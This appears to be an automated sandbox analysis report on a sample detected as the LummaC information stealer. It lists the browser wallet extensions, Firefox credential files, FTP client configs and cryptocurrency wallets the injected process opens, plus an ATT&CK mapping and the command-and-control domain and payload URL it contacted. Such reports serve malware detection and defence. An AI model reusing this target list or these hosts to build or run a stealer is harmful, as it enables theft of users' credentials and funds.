Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\XQACHMZIHU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\XQACHMZIHU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\XQACHMZIHU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\XQACHMZIHU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\TTCBKWZYOC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\TTCBKWZYOC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2214373366.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 768, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	13 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	13 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Script.exe	29%	Virustotal		Browse
Script.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://property-imper.sbs/apic	0%	Avira URL Cloud	safe
https://property-imper.sbs:443/apiicrosoft	0%	Avira URL Cloud	safe
http://147.45.47.81:80/conhost.exeicrosoft	0%	Avira URL Cloud	safe
http://147.45.47.81/	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exeR	0%	Avira URL Cloud	safe
http://147.45.47.81/	18%	Virustotal		Browse
http://147.45.47.81/conhost.exe	0%	Avira URL Cloud	safe
https://property-imper.sbs/(	0%	Avira URL Cloud	safe
https://property-imper.sbs/$	0%	Avira URL Cloud	safe
https://property-imper.sbs/api;I	0%	Avira URL Cloud	safe
http://147.45.47.81/v	0%	Avira URL Cloud	safe
https://property-imper.sbs/b	0%	Avira URL Cloud	safe
http://crl.microh	0%	Avira URL Cloud	safe
https://property-imper.sbs:443/apiK	0%	Avira URL Cloud	safe
https://property-imper.sbs/apiN	0%	Avira URL Cloud	safe
https://property-imper.sbs/Z	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exet	0%	Avira URL Cloud	safe
https://property-imper.sbs/apiZuV	0%	Avira URL Cloud	safe
https://property-imper.sbs/R	0%	Avira URL Cloud	safe
https://property-imper.sbs/pi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
property-imper.sbs	104.21.33.116	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://property-imper.sbs/api	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.47.81:80/conhost.exeicrosoft	aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/apic	aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs:443/apiicrosoft	aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs:443/api	aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/	aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/conhost.exeR	aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/conhost.exe	aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
